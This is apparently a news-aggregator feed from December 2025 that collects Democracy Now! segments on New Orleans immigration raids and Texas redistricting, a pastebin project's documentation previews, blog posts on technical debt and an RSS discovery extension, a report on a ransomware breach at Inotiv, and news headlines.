
MICH GONZÁLEZ: Public safety is at the heart —

Little kids are not going to school right now. People are not able to take their disabled parents to their medical appointments. … Please, I’m begging you.

PROTESTERS : Shame! Shame!

MICH GONZÁLEZ: And right now it’s about the safety of the people who live here. But I promise you, in just — these people are planning to stay here for two months and take as many as 5,000 of the people who live in this great city of New Orleans.

PROTESTERS : Shame! Shame!

MICH GONZÁLEZ: And they are the people who work here. They’re the people who clean dishes here. They’re the people who take care of the elderly in the nursing homes. … Please, I’m begging you.

AMY GOODMAN : For more, we’re joined by Homero López, legal director for ISLA, Immigrant Services and Legal Advocacy, based in New Orleans.

Welcome to Democracy Now! , Homero. If you can start off by talking about what exactly you understand this plan is? As they move in 250 immigration agents, they say they’re making 5,000 arrests in the next two months. What’s happening to New Orleans?

HOMERO LÓPEZ: Yes. Thank you, Amy, for having me on.

We have seen the officers come into the city and the surrounding areas, as well. And the fact that they’re looking for a specific quota, that they have a number that they’re going after, makes it clear that they’re not targeting, as they claim, the worst of the worst. Instead, they’re going to target whoever they can, and as the Supreme Court has unfortunately authorized them, they’re using racial profiling as part of that approach.

AMY GOODMAN : They’re calling it “Catahoula Crunch.” Louisiana’s state dog is the Catahoula. Explain what they’re saying here, what Kristi Noem is talking about, who the immigrants are that they’re going after.

HOMERO LÓPEZ: Yeah. They originally had called it the “Swamp Sweep,” but I guess they thought “SS” was a little bit too on the nose, so they went after “Catahoula Crunch” instead.

And what they’re saying is they’re going to target, you know, folks who have criminal backgrounds, or at least that’s the purported position from the higher-ups at least. There was a video of Bovino recently saying he’s going after immigrants. He was asked, “Who are you targeting? What are you — who are you looking for?” And he said, “This is an immigration raid.” And so, he’s — they’re focusing on immigrants across the board.

What we’ve seen has been folks at work, folks at their check-ins, people around schools, ICE officers setting up around or CBP officers setting up around the schools. And the fear that’s being — the fear that’s coming into the — being sowed in the community is really the true intent of what they’re — of their operation here.

AMY GOODMAN : Catahoula Crunch named after the Louisiana state dog. Didn’t Homeland Secretary Kristi Noem famously shoot her dog?

HOMERO LÓPEZ: That is a story that’s come out, yes.

AMY GOODMAN : Many ICE officials who now work at the national level came up through Louisiana. Is that right? Can you talk about them? And who are the hundreds of agents moved in to do these arrests?

HOMERO LÓPEZ: Yeah, Louisiana is playing an oversized role when it comes to immigration enforcement throughout the country. The former wildlife and fisheries secretary here in Louisiana is now one of the deputy — or, is the deputy director of ICE nationally. Our former area, New Orleans, ICE director, field office director, is also at headquarters. There are various deportation officers here from Louisiana who have gone to work at headquarters. And so, the approach that they used to take or that they have taken in Louisiana since 2014 to incarcerate as many people as possible, quickly warehouse and deport people from the state, is something that seems to be the structure that is being operated now from the national headquarters.

AMY GOODMAN : Louisiana, in other parts of the country, we know it particularly here when it comes to detention. You have Mahmoud Khalil, who is the Columbia student who was imprisoned in Louisiana. You have Rümeysa Öztürk, the Tufts graduate student who was imprisoned in Louisiana. Talk about the overall detention complex in Louisiana.

HOMERO LÓPEZ: Louisiana has a history, a terrible history, of being the incarceration capital of the world. And that is no different when it comes now to immigration detention. Louisiana is number two when it comes to the second — the state with the second-largest detained immigrant population in the country, next to Texas. However, we’re not a border state. We also don’t have a large immigrant population by numbers. Instead, what Louisiana does is it receives a lot of people who are detained around the country.

And so, the additional aspect of what happens in Louisiana is that we have these very rural, isolated detention centers in central Louisiana, central and northern Louisiana, which are very far away from major metropolitan or from major population centers, which means what you end up with is people removed from their legal and support systems. So, when you had someone like Mahmoud Khalil being moved down here from New York, what you had was removing him from his social network, from people who could assist him, from being able to provide him with assistance. Same thing with Rümeysa Öztürk. And these were highly publicized cases, places where folks had large support networks. And so, when we deal with folks who don’t have those support networks, who don’t have that publicity, who don’t have that kind of support, and you have them in such a remote, isolated area, what you end up is basically warehousing folks without giving them an opportunity to fight their case and be able to present a viable case through actual due process.

AMY GOODMAN : You can’t help but notice that New Orleans is a blue city in a red state, Louisiana. Louisiana has the most detention beds outside of Texas. Can you talk about the consent decree that was overturned last month, Homero?

HOMERO LÓPEZ: The consent decree was overturned last month by the Justice Department, and they wanted to get rid of it. It had been in place for over a decade here in Louisiana, that did not — or, here in New Orleans, that had not allowed the local sheriff’s office to cooperate with ICE .

Now the new sheriff, we don’t know exactly what she’s going to do, but what it does is it removes this tool that existed, which was originally implemented because of previous abuses, that had been determined by a federal court, that New Orleans police, New Orleans Sheriff’s Office should not be cooperating, and had ordered the sheriff’s office not to cooperate. Without that consent decree in place, it’s now up to the sheriff. And so, there is a movement on the ground from advocacy groups and from other organizers to push the sheriff to continue to have that kind of policy, but we’ll see what comes from that.

AMY GOODMAN : And can you talk about the people you represent? I mean, I think it’s really important, not only in New Orleans, but around the country. A number of the people being picked up are going to their court hearings. They are following the rules, and they end up being arrested.

HOMERO LÓPEZ: Yeah, the majority of people who are being arrested, the majority of calls that we’re receiving are from folks who have — who are going through the process, whether they be children who originally applied through the Special Immigrant Juvenile status process and are awaiting their ability to apply for residency, whether it’s spouses of U.S. citizens who are going to their interviews and are being picked up, whether it’s people who have immigration court hearings and have filed their applications and are attending the hearings, are going — again, they’re doing it, quote-unquote, “the right way.” And that’s who is being picked up. Those are the folks who are the low-hanging fruit. Those are the folks who are going to be targeted.

There’s a reason that these officers are going to worksites and not necessarily doing in-depth investigations to identify folks that they claim are a danger to the community. Instead, what they’re doing is they’re taking folks out of our community: our neighbors, our friends, our family members. And that’s who they’re detaining and they’re sending into these terrible detention centers in order to try to quickly deport them from the country.

AMY GOODMAN : Homero López, I want to thank you for being with us. Do you have a final comment on the City Council hearing that was held yesterday as mics were turned off on person after person who was calling for ICE-free zones?

HOMERO LÓPEZ: Yeah, we hope that City Council will take a stance. We understand that they don’t necessarily have a ton of power over federal actions, but the point here is about the values that the city stands for and what we are going to demonstrate to our community and to our residents of who we support, what we support and what we stand for in the city.

AMY GOODMAN : Homero López is the legal director of ISLA, the Immigration Services and Legal Advocacy, based in New Orleans, Louisiana.


Rigging Democracy: Supreme Court Approves Racial Texas Gerrymander, Handing Trump Midterm Advantage

Democracy Now!
www.democracynow.org
2025-12-05 13:14:36
The conservative majority on the U.S. Supreme Court has cleared the way for Texas to use a gerrymandered congressional map in next year’s midterm elections that a lower court found racially discriminatory. The 6-3 ruling is another political win for President Donald Trump and his allies, who h...
Original Article

This is a rush transcript. Copy may not be in its final form.

AMY GOODMAN : A major victory for President Trump: The Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five House seats in next year’s midterms. A lower court previously ruled the redistricting map was unconstitutional because it had been racially gerrymandered and would likely dilute the political power of Black and Latino voters.

Supreme Court Justice Elena Kagan wrote in her dissent, quote, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution,” Justice Kagan wrote.

For more, we’re joined by Ari Berman, voting rights correspondent for Mother Jones magazine. His new piece is headlined “The Roberts Court Just Helped Trump Rig the Midterms.” Ari is the author of Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It.

Ari Berman, welcome back to Democracy Now! Talk about the significance of this Supreme Court decision yesterday. And what exactly was Samuel Alito’s role?

ARI BERMAN : Good morning, Amy, and thank you for having me back on the show.

So, the immediate effect is that Texas will now be able to use a congressional map that has already been found to be racially gerrymandered and could allow Republicans to pick up five new seats in the midterms. And remember, Texas started this whole gerrymandering arms race, where state after state is now redrawing their maps ahead of the midterms, essentially normalizing something that is deeply abnormal.

It was an unsigned majority opinion, but Samuel Alito wrote a concurrence, basically saying that the Texas map was a partisan map, pure and simple. And remember, Amy, the Supreme Court has already laid the groundwork for Texas to do this kind of thing by essentially saying that partisan gerrymandering cannot be reviewed in federal court, no matter how egregious it is. They have blocked racial gerrymandering in the past, but now, essentially, what they’re allowing to do is they’re allowing Texas to camouflage a racial gerrymander as a partisan gerrymander, and they’ve given President Trump a huge victory in his war against American democracy.

AMY GOODMAN : This overturned a lower court ruling. What are the role of the courts now, with the Supreme Court ruling again and again on this?

ARI BERMAN : Well, basically, what the Supreme Court has done is it’s given President Trump the power of a king, and it’s given itself the power of a monarchy, because what happens is lower courts keep striking down things that President Trump and his party do, including Trump appointees to the lower courts — the Texas redistricting map was struck down by a Trump appointee, who found that it was racially gerrymandered to discriminate against Black and Latino voters. What the Roberts Court did was overturn that lower court opinion, just as it’s overturned so many other lower court opinions to rule in favor of Donald Trump and his party.

And one of the most staggering things, Amy, is the fact that the Roberts Court has ruled for President Trump 90% of the time in these shadow docket cases. So, in all of these big issues, whether it’s on voting rights or immigration or presidential powers, lower courts are constraining the president, and the Supreme Court repeatedly is saying that the president and his party are essentially above the law.

AMY GOODMAN : So, you have talked about the Supreme Court in 2019 ruling in a case, ordered that courts should stay out of disputes over partisan gerrymandering. Tell us more about that.

ARI BERMAN : It was really a catastrophic ruling for democracy, because what it said is that no matter how egregiously a state gerrymanders to try to target a political party, that those claims not only can’t be struck down in federal court, they can’t even be reviewed in federal court. And what that has done is it said to the Texases of the world, “You can gerrymander as much as you want, as long as you say that you’re doing it for partisan purposes.”

So, this whole exercise made a complete mockery of democracy, because Texas goes out there and says, “We freely admit that we are drawing these districts to pick up five new Republican seats.” President Trump says, “We’re entitled to five new seats.” Now, that would strike the average American as absurd, the idea that you could just redraw maps mid-decade to give more seats to your party. But the Supreme Court has basically laid the groundwork for that to be OK.

And even though racial gerrymandering, discriminating against Black and Hispanic voters, for example, is unconstitutional, which is what the lower court found in Texas, the Roberts Court continually has allowed Republicans to get away with this kind of racial gerrymandering by allowing them to just claim that it’s partisan gerrymandering. And that’s what happened once again in Texas yesterday.

AMY GOODMAN : Where does this leave the Voting Rights Act? And for people, especially young people who, you know, weren’t alive in 1965, explain what it says and its importance then.

ARI BERMAN : The Voting Rights Act is the most important piece of civil rights legislation ever passed by the Congress. It quite literally ended the Jim Crow regime in the South by getting rid of the literacy tests and the poll taxes and all the other suppressive devices that had prevented Black people from being able to register and vote in the South for so many years.

It has been repeatedly gutted by the Roberts Court, which has ruled that states with a long history of discrimination, like Texas, no longer have to approve their voting changes with the federal government. The Roberts Court has made it much harder to strike down laws that discriminate against voters of color. And now they are preparing potentially to gut protections that protect people of color from being able to elect candidates of choice.

And I think the Texas ruling is a bad sign, another bad sign, for the Voting Rights Act, because a lower court found that Texas drew these maps to discriminate against Black and Latino voters, that they specifically targeted districts where Black and Latino voters had elected their candidates of choice. And the Supreme Court said, “No, we’re OK with doing it.” So it was yet another example in which the Supreme Court is choosing to protect white power over the power of Black, Latino, Asian American voters.

AMY GOODMAN : So, where does this leave the other cases? You have California’s Prop 50 to redraw the state’s congressional districts, but that was done another way. It was done by a referendum. The people of California voted on it. And then you’ve got North Carolina. You’ve got Missouri. Where does this leave everything before next midterm elections?

ARI BERMAN : Yeah, there’s a lot of activity in the courts so far. A federal court has already upheld North Carolina’s map, which was specifically targeted to dismantle a district of a Black Democrat there. The only district they changed was held by a Black Democrat in the state. In Missouri right now, organizers are trying to get signatures for a referendum to be able to block that district, which also targeted the district of a Black Democrat, Emanuel Cleaver.

California’s law is being challenged by Republicans and by the Justice Department. The Supreme Court did signal, however, in its decision in Texas that they believe that the California map was also a partisan gerrymander, so that that would lead one to believe that if the Supreme Court is going to uphold the Texas map, they would also uphold the California map.

And we’ve also seen repeatedly that there’s double standards for this court, that they allow Republicans to get away with things that they don’t allow Democrats to get away with. They’ve allowed Trump to get away with things that they did not allow Biden to get away with. But generally speaking, it seems like the Supreme Court is going to allow states to gerrymander as much as they want. And that’s going to lead to a situation where American democracy is going to become more rigged and less fair.

AMY GOODMAN : Ari Berman, voting rights correspondent for Mother Jones magazine, author of Minority Rule: The Right-Wing Attack on the Will of the People — and the Fight to Resist It. We’ll link to your piece, “The Roberts Court Just Helped Trump Rig the Midterms.”

Next up, immigration crackdowns continue nationwide. We’ll go to New Orleans, where agents are expected to make 5,000 arrests, and to Minneapolis, as Trump escalates his attacks on the Somali community there, calling the whole community “garbage.” Stay with us.

[break]

AMY GOODMAN : “Ounadikom,” “I Call Out to You,” composed by Ahmad Kaabour at the outbreak of the Lebanese Civil War in 1975 and performed at a Gaza benefit concert on Wednesday by the NYC Palestinian Youth Choir.


Show HN: Pbnj – A minimal, self-hosted pastebin you can deploy in 60 seconds

Hacker News
pbnj.sh
2025-12-05 13:13:03
Comments...
Original Article
# API Reference

## Authentication

All write operations require a Bearer token:
```
Authorization: Bearer YOUR_AUTH_KEY
```

## Endpoints

### Create Paste

POST /api

#### JSON Request
```bash
curl 

05_api.md


# CLI Reference

## Installation

```bash
npm install -g @pbnjs/cli
```

## Configuration

Run the setup wizard:
```bash
pbnj --init
```

This creates ~/.pbnj with your configuration:
```
PBNJ_HOST=ht

04_cli.md


# Cost Breakdown

"This is deployed on Cloudflare, they might charge us eventually!"

Don't worry. Let's do the math.

## Cloudflare D1 Free Tier

- 500 MB storage
- 5 million reads/day
- 100,000 writ

03_cost.md


# Deployment Guide

## One-Click Deploy (Recommended)

Click the "Deploy to Cloudflare" button on the GitHub repo — that's it!

The deploy button automatically:
- Forks the repo to your GitHub account

02_deployment.md


# Welcome to pbnj

pbnj is a simple, minimal self-hosted pastebin solution.

## What is pbnj?

pbnj lets you share code snippets and text files with a simple URL.
No accounts, no bloat - just paste an

01_welcome.md


# Web Interface

pbnj includes a web interface for creating and managing pastes directly from your browser.

## Authentication

The web interface uses the same `AUTH_KEY` as the CLI and API. Authentic

07_web_interface.md


# Configuration

pbnj is configured through a single `pbnj.config.js` file in the project root.

## Default Configuration

```js
export default {
  name: 'pbnj',
  logo: '/logo.png',
  idStyle: 'sandw

06_configuration.md


Most technical problems are people problems

Hacker News
blog.joeschrag.com
2025-12-05 13:07:59
Comments...
Original Article

Most Technical Problems Are Really People Problems

I once worked at a company which had an enormous amount of technical debt - millions of lines of code, no unit tests, based on frameworks that were well over a decade out of date.  On one specific project, we had a market need to get some Windows-only modules running on Linux, and rather than cross-compiling, another team had simply copied & pasted a few hundred thousand lines of code, swapping Windows-specific components for Linux-specific.

For the non-technical reader, this is an enormous problem because now two versions of the code exist.  So, all features & bug fixes must be solved in two separate codebases that will grow apart over time.  When I heard about this, a young & naive version of me set out to fix the situation....

Tech debt projects are always a hard sell to management, because even if everything goes flawlessly, the code just does roughly what it did before. This project was no exception, and the optics weren't great.  I did as many engineers do and "ignored the politics", put my head down, and got it done.  But, the project went long, and I lost a lot of clout in the process.

I realized I was essentially trying to solve a people problem with a technical solution.  Most of the developers at this company were happy doing the same thing today that they did yesterday...and five years ago.  As Andrew Harmel-Law points out, code tends to follow the personalities of the people that wrote it.  The code was calcified because the developers were also.  Personality types who dislike change tend not to design their code with future change in mind.

Most technical problems are really people problems. Think about it.  Why does technical debt exist?  Because requirements weren't properly clarified before work began.  Because a salesperson promised an unrealistic deadline to a customer.  Because a developer chose an outdated technology because it was comfortable.  Because management was too reactive and cancelled a project mid-flight.  Because someone's ego wouldn't let them see a better way of doing things.

The core issue with the project was that admitting the need for refactoring was also to admit that the way the company was building software was broken and that individual skillsets were sorely out of date.  My small team was trying to fix one module of many, while other developers were writing code as they had been for decades.  I had one developer openly tell me, "I don't want to learn anything new."  I realized that you'll never clean up tech debt faster than others create it. It is like triage in an emergency room: you must stop the bleeding first, then you can fix whatever is broken.

An Ideal World

The project also disabused me of the engineer's ideal of a world in which engineering problems can be solved in a vacuum - staying out of "politics" and letting the work speak for itself - a world where deadlines don't exist...and let's be honest, neither do customers.  This ideal world rarely exists.  The vast majority of projects have non-technical stakeholders, and telling them "just trust me; we're working on it" doesn't cut it.  I realized that the perception that your team is getting a lot done is just as important as getting a lot done.

Non-technical people do not intuitively understand the level of effort required or the need for tech debt cleanup; it must be communicated effectively by engineering - in both initial estimates & project updates.  Unless leadership has an engineering background, the value of the technical debt work likely needs to be quantified and shown as business value.

Heads Up

Perhaps these are the lessons that prep one for more senior positions.  In my opinion, anyone above senior engineer level needs to know how to collaborate cross-functionally, regardless of whether they choose a technical or management track.  Schools teach Computer Science, not navigating personalities, egos, and personal blindspots.

I have worked with some incredible engineers, better than myself - the type that have deep technical knowledge on just about any technology you bring up.  When I was younger, I wanted to be that engineer - the "engineer's engineer".  But I realize now, that is not my personality.  I'm too ADD for that. :)

For all of their (considerable) strengths, more often than not, those engineers shy away from the interpersonal.  The tragedy is that they are incredibly productive ICs, but may fail with bigger initiatives because they are only one person - a single processor core can only go so fast.  Perhaps equally valuable is the "heads up coder" - the person who is deeply technical, but also able to pick their head up & see project risks coming (technical & otherwise) and steer the team around them.

Pharma firm Inotiv discloses data breach after ransomware attack

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 13:05:52
American pharmaceutical firm Inotiv is notifying thousands of people that their personal information was stolen in an August 2025 ransomware attack. [...]...
Original Article

Inotiv

American pharmaceutical firm Inotiv is notifying thousands of people that their personal information was stolen in an August 2025 ransomware attack.

Inotiv is an Indiana-based contract research organization specializing in drug development, discovery, and safety assessment, as well as live-animal research modeling. The company has about 2,000 employees and an annual revenue exceeding $500 million.

When it disclosed the incident, Inotiv said that the attack had disrupted business operations after some of its networks and systems (including databases and internal applications) were taken down.

Earlier this week, the company revealed in a filing with the U.S. Securities and Exchange Commission (SEC) that it has "restored availability and access" to impacted networks and systems and that it's now sending data breach notifications to 9,542 individuals whose data was stolen in the August ransomware attack.

"Our investigation determined that between approximately August 5-8, 2025, a threat actor gained unauthorized access to Inotiv's systems and may have acquired certain data," it says in letter samples filed with Maine's attorney general .

"Inotiv maintains certain data related to current and former employees of Inotiv and their family members, as well as certain data related to other individuals who have interacted with Inotiv or companies it has acquired."

Inotiv has not yet shared which types of data were stolen during the incident, nor has it attributed the attack to a specific cybercrime operation.

However, the Qilin ransomware group claimed responsibility for the breach in August, leaked data samples allegedly stolen from the company's compromised systems, and said they exfiltrated over 162,000 files totaling 176 GB.

Inotiv entry on Qilin's leak site (BleepingComputer)

An Inotiv spokesperson has not yet responded to BleepingComputer's request for comment regarding the validity of Qilin ransomware's claims.

Qilin surfaced in August 2022 as a Ransomware-as-a-Service (RaaS) operation under the "Agenda" name and has since claimed responsibility for over 300 victims on its dark web leak site.

Qilin ransomware's list of victims includes high-profile organizations such as automotive giant Yangfeng , Australia's Court Services Victoria , publishing giant Lee Enterprises , and pathology services provider Synnovis .

The Synnovis incident affected several major NHS hospitals in London, forcing them to cancel hundreds of appointments and operations .


Golang’s Big Miss on Memory Arenas

Lobsters
avittig.medium.com
2025-12-05 13:02:50
Comments...

Making RSS More Fun

Hacker News
matduggan.com
2025-12-05 13:00:28
Comments...
Original Article

I don't like RSS readers. I know, this is blasphemous especially on a website where I'm actively encouraging you to subscribe through RSS. As someone writing stuff, RSS is great for me. I don't have to think about it, the requests are pretty light weight, I don't need to think about your personal data or what client you are using. So as a protocol RSS is great, no notes.

However, as something I'm going to consume, it's frankly a giant chore. I feel pressured by RSS readers, where there is this endlessly growing backlog of things I haven't read. I rarely want to read all of a website's content from beginning to end; instead I like to jump between them. I also don't really care if the content is chronological: an old post about something interesting isn't less compelling to me than a newer post.

What I want, as a user experience, is something akin to TikTok. The whole appeal of TikTok, for those who haven't wasted hours of their lives on it, is that I get served content based on an algorithm that determines what I might think is useful or fun. However what I would like is to go through content from random small websites. I want to sit somewhere and passively consume random small creators content, then upvote some of that content and the service should show that more often to other users. That's it. No advertising, no collecting tons of user data about me, just a very simple "I have 15 minutes to kill before the next meeting, show me some random stuff."

In this case the "algorithm" is pretty simple: if more people like a thing, more people see it. But with Google on its way to replacing search results with LLM generated content, I just wanted to have something that let me play around with the small web the way that I used to.

There actually used to be a service like this called StumbleUpon which was more focused on pushing users towards popular sites. It has been taken down, presumably because there was no money in a browser plugin that sent users to other websites whose advertising you didn't control.

TL;DR

You can go download the Firefox extension now and try this out and skip the rest of this if you want. https://timewasterpro.xyz/ If you hate it or find problems, let me know on Mastodon. https://c.im/@matdevdug

Functionality

So I wanted to do something pretty basic. You hit a button, get served a new website. If you like the website, upvote it, otherwise downvote it. If you think it has objectionable content then hit report. You have to make an account (because I couldn't think of another way to do it) and then if you submit links and other people like it, you climb a Leaderboard.

On the backend I want to (very slowly so I don't cost anyone a bunch of money) crawl a bunch of RSS feeds, stick the pages in a database and then serve them up to users. Then I want to track what sites get upvotes and return those more often to other users so that "high quality" content shows up more often. "High quality" would be defined by the community or just me if I'm the only user.
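One simple way to get "liked pages show up more often" is score-weighted random sampling. A minimal sketch, assuming a sqlite table named pages with likes/dislikes/reported columns (the names are made up, not the actual schema):

import random
import sqlite3

def pick_page(db_path="pages.db"):
    con = sqlite3.connect(db_path)
    rows = con.execute(
        "SELECT url, likes - dislikes AS score FROM pages WHERE reported = 0"
    ).fetchall()
    con.close()
    # shift scores so every page keeps a nonzero chance of being served
    weights = [max(score, 0) + 1 for _, score in rows]
    url, _ = random.choices(rows, weights=weights, k=1)[0]
    return url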

It's pretty basic stuff, most of it copied from tutorials scattered around the Internet. However I really want to drive home to users that this is not a Serious Thing. I'm not a company, this isn't a new social media network, there are no plans to "grow" this concept beyond the original idea unless people smarter than me ping with me ideas. So I found this amazing CSS library: https://sakofchit.github.io/system.css/

Apple's System OS design from the late '80s to early '90s was one of my personal favorites, and I think it sends a strong signal to the user that this is not a professional, modern service.

Great, the basic layout works. Let's move on!

Backend

So I ended up doing FastAPI because it's very easy to write. I didn't want to spend a ton of time writing the API because I doubt I nailed the API design on the first round. I use sqlalchemy for the database. The basic API layout is as follows:

  • admin - mostly just generating read-only reports of like "how many websites are there"
  • leaderboard - So this is my first attempt at trying to get users involved. Submit a website that other people like? Get points, climb leaderboard.

The source for the RSS feeds came from the (very cool) Kagi small web Github. https://github.com/kagisearch/smallweb . Basically I assume that websites that have submitted their RSS feeds here are cool with me (very rarely) checking for new posts and adding them to my database. If you want the same thing as this does, but as an iFrame, that's the Kagi small web service.

The scraping work is straightforward. We make a background worker; it grabs 5 feeds every 600 seconds, checks each feed for new content, and then waits until the 600 seconds have elapsed to grab the next 5 from the smallweb list of RSS feeds. Since we have a lot of feeds, this ends up looking like we're checking each feed for new content less than once a day, which is the interval that I want.
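A minimal sketch of that polling loop, assuming feedparser for RSS parsing and a hypothetical save_if_new helper (illustrative, not the actual source):

import asyncio
import feedparser  # assumed RSS parsing library

async def poll_feeds(feeds, batch_size=5, interval=600):
    i = 0
    while True:
        for url in feeds[i:i + batch_size]:
            parsed = feedparser.parse(url)
            for entry in parsed.entries:
                save_if_new(entry.link, entry.get("title", ""))  # hypothetical helper
        i = (i + batch_size) % max(len(feeds), 1)
        await asyncio.sleep(interval)  # wait out the rest of the 600s window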

Then we write it out to a sqlite database and basically track whether a URL has been reported (if so, it goes into a review queue) and how many times it has been liked or disliked. I considered a "real" database, but honestly sqlite is getting more and more scalable every day and it's impossible to beat the immediate startup and functionality. Plus it's very easy to back up to encrypted object storage, which is super nice for a hobby project where you might wipe the prod database at any moment.

In terms of user onboarding I ended up doing the "make an account with an email, I send a link to verify the email". I actually hate this flow and I don't really want to know a users email. I never need to contact you and there's not a lot associated with your account, which makes this especially silly. I have a ton of email addresses and no real "purpose" in having them. I'd switch to Login with Apple, which is great from a security perspective but not everybody has an Apple ID.

I also did a passkey version, which worked fine but the OSS passkey handling was pretty rough still and most people seem to be using a commercial service that handled the "do you have the passkey? Great, if not, fall back to email" flow. I don't really want to do a big commercial login service for a hobby application.

Auth is a JWT, which actually was a pain and I regret doing it. I don't know why I keep reaching for JWTs, they're a bad user experience and I should stop.

Can I just have the source code?

I'm more than happy to release the source code once I feel like the product is in a somewhat stable shape. I'm still ripping down and rewriting relatively large chunks of it as I find weird behavior I don't like or just decide to do things a different way.

In the end it does seem to do whats on the label. We have over 600,000 individual pages indexed.

So how is it to use?

Honestly I've been pretty pleased. But there are some problems.

First I couldn't find a reliable way of switching the keyboard shortcuts to be Mac/Windows specific. I found some options for querying platform but they didn't seem to work, so I ended up just hardcoding them as Alt which is not great.

The other issue is that when you are making an extension, you spend a long time working with these manifests.json. The specific part I really wasn't sure about was:

"browser_specific_settings": {
    "gecko": {
      "id": "[email protected]",
      "strict_min_version": "80.0",
      "data_collection_permissions": {
        "required": ["authenticationInfo"]
      }
    }
  }

I'm not entirely sure if that's all I'm doing? I think so from reading the docs.

Anyway I built this mostly for me. I have no idea if anybody else will enjoy it. But if you are bored I encourage you to give it a try. It should be pretty lightweight and straightforward if you crack open the extension and look at it. I'm not loading any analytics into the extension, so basically until people complain about it, I don't really know if it's going well or not.

Future stuff

  • I need to sort stuff into categories so that you get more stuff in genres you like. I don't 100% know how to do that, maybe there is a way to scan a website to determine the "types" of content that is on there with machine learning? I'm still looking into it.
  • There's a lot of junk in there. I think if we reach a certain number of downvotes I might put it into a special "queue".
  • I want to ensure new users see the "best stuff" early on but there isn't enough data to determine "best vs worst".
  • I wish there were more independent photography and science websites. Also more crafts. That's not really a "future thing", just me putting a hope out into the universe. Non-technical beta testers get overwhelmed by technical content.

Headlines for December 5, 2025

Democracy Now!
www.democracynow.org
2025-12-05 13:00:00
“One of the Most Troubling Things I’ve Seen”: Lawmakers React to U.S. “Double-Tap” Boat Strike, Pentagon Watchdog Finds Hegseth’s Use of Signal App “Created a Risk to Operational Security”, CNN Finds Israel Killed Palestinian Aid Seekers and Bulldozed ...
Original Article

Headlines December 05, 2025


“One of the Most Troubling Things I’ve Seen”: Lawmakers React to U.S. “Double-Tap” Boat Strike

Dec 05, 2025

The Pentagon has announced the U.S. blew up another boat in the eastern Pacific, killing four people. The Pentagon claimed the boat was carrying drugs but once again offered no proof. The U.S. has now killed at least 87 people in 22 strikes on boats since September. This comes as controversy continues to grow over a September 2 strike, when the U.S. targeted and killed two men who had survived an initial attack. Nine people were killed in the first strike. On Thursday, members of Congress were shown video of two men being killed at a time when they were clinging to the side of their overturned boat. Democratic Representative Jim Himes of Connecticut spoke after watching the video.

Rep. Jim Himes: “What I saw in that room was one of the most troubling things I’ve seen in my time in public service. You have two individuals in clear distress without any means of locomotion, with a destroyed vessel, who are killed by the United States.”

Lawmakers also questioned Admiral Frank “Mitch” Bradley, the operation’s commanding officer. Many questions remain over Defense Secretary Pete Hegseth’s role. The Washington Post recently reported Hegseth had ordered Pentagon officials to “kill everybody” on the boat.

Pentagon Watchdog Finds Hegseth’s Use of Signal App “Created a Risk to Operational Security”

Dec 05, 2025

The Pentagon’s inspector general has released its report examining Hegseth’s sharing of sensitive information about U.S. strikes in Yemen on a Signal group chat earlier this year. The report found Hegseth’s actions “created a risk to operational security that could have resulted in failed U.S. mission objectives and potential harm to U.S. pilots.” The report also criticized Hegseth’s use of a personal cellphone to conduct official business. Hegseth himself refused to cooperate with the investigation, refusing to hand over his phone or sit for an interview.

CNN Finds Israel Killed Palestinian Aid Seekers and Bulldozed Bodies into Shallow, Unmarked Graves

Dec 05, 2025

Israel’s military is continuing to pound the Gaza Strip in violation of the October 10 ceasefire agreement. Al Jazeera reports Israeli ships opened fire toward the coast of Khan Younis, while air raids struck the city of Rafah. There are reports of explosions and Israeli artillery fire around Gaza City, including airstrikes near the Maghazi refugee camp.

Meanwhile, a CNN investigation has found the Israeli military fired indiscriminately at starving Palestinians collecting sacks of flour near an aid distribution site near the Zikim crossing in June, then bulldozed their bodies into shallow, unmarked graves, with some bodies left to decompose or be partially eaten by dogs. Gaza officials and the United Nations estimate about 10,000 Palestinians remain missing from Israel’s more than two-year assault, while the official death toll recently passed 70,000.

Ireland, Slovenia, Spain and the Netherlands to Boycott Eurovision over Israel’s Participation

Dec 05, 2025

Image Credit: 'The Rising Star' Keshet 12

Public broadcasters in Ireland, Slovenia, the Netherlands and Spain said Thursday they will boycott the 2026 Eurovision Song Contest, after the European Broadcasting Union refused to hold a vote on whether to exclude Israel. This is José Pablo López, president of Spain’s national broadcaster.

José Pablo López: “We maintain the same position we had months ago when we said Israel’s participation in the Eurovision festival was untenable for two main reasons, firstly because of the genocide it has perpetrated in Gaza. As president of the corporation, I keep thinking that Eurovision is a contest, but human rights are not a contest.”

Eurovision is among the most popular TV and online events in the world; last year, viewers from 156 countries cast votes for their favorite contestants.

Protesters Picket New Jersey Warehouse, Seeking to Block Arms Shipments to Israel

Dec 05, 2025

In New Jersey, protesters picketed this morning outside a Jersey City warehouse that is used to transport military cargo to Israel. A recent report by the Palestinian Youth Movement and Progressive International found the warehouse handles over 1,000 tons of Israel-bound military cargo every week, including thousands of MK-84 2,000-pound bombs that have been used to level Gaza.

Supreme Court Allows Texas to Use Racially Gerrymandered Congressional Map Favoring Republicans

Dec 05, 2025

The U.S. Supreme Court has cleared the way for Texas to use a new congressional map designed to help Republicans pick up as many as five seats next year. A lower court had previously ruled the redistricting plan was unconstitutional because it would likely dilute the political power of Black and Latino voters. Liberal Supreme Court Justice Elena Kagan wrote in her dissent, “This court’s stay ensures that many Texas citizens, for no good reason, will be placed in electoral districts because of their race. And that result, as this court has pronounced year in and year out, is a violation of the constitution.”

FBI Arrests Suspect for Allegedly Planting Pipe Bombs on Capitol Hill Ahead of Jan. 6 Insurrection

Dec 05, 2025

The FBI has arrested a 30-year-old man from Virginia for allegedly planting pipe bombs near the Republican and Democratic National Committee headquarters in January 2021 — on the night before the January 6 insurrection at the U.S. Capitol. The suspect, Brian Cole, is expected to appear in court today.

DOJ Asks Judge to Rejail Jan. 6 Rioter Pardoned by Trump, After Threats to Rep. Jamie Raskin

Dec 05, 2025

The Justice Department has asked a judge to rejail a participant in the January 6 insurrection who had been pardoned by President Trump. The Justice Department made the request after the man, Taylor Taranto, showed up near the home of Democratic Congressmember Jamie Raskin, who served on the January 6 House Select Committee. Security has been increased for Raskin. In October, Taranto was sentenced to time served for making a threat near the home of former President Obama.

Grand Jury Refuses to Reindict Letitia James After Judge Throws Out First Indictment

Dec 05, 2025

